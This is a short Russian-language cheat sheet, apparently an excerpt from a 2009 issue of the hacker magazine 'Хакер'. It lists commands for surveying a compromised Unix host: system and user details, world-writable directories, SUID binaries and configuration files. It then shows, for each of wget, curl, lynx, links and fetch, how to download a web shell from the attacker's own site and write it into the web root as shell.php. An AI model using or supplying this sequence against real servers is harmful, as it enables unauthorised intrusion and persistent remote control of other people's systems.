Смотрим версию системы, процессора, ядра и др.:
$ uname -a
Под кем мы залогинились?:
$ whoami
Сколько свободного места на дисках?:
$ df -h
А какой установлен процессор?:
$ cat /proc/cpuinfo
Находим директории, доступные на запись, относительно текущей:
$ find . -perm -2 -type d -ls
Находим файлы с установленным SUID-битом:
$ find / -type f -perm -04000 -ls
Ищем конфигурационные файлы:
$ find / -type f -name "config*"
Поиск "качалок":
$ which wget; which curl; which lynx; which links; which fetch
Для каждой качалки разный синтаксис:
$ wget
http://твой_сайт/shell.txt -O /home/user/www/shell.php
$ curl
http://твой_сайт/shell.txt -o /home/user/www/shell.php
$ links -source
http://твой_сайт/shell.txt > /home/user/www/shell.php
$ lynx -source
http://твой_сайт/shell.txt > /home/user/www/shell.php
$ fetch -o
http://твой_сайт/shell.txt -p /home/user/www/shell.php
Выдержка из журнала "Хакер" за 2009 год.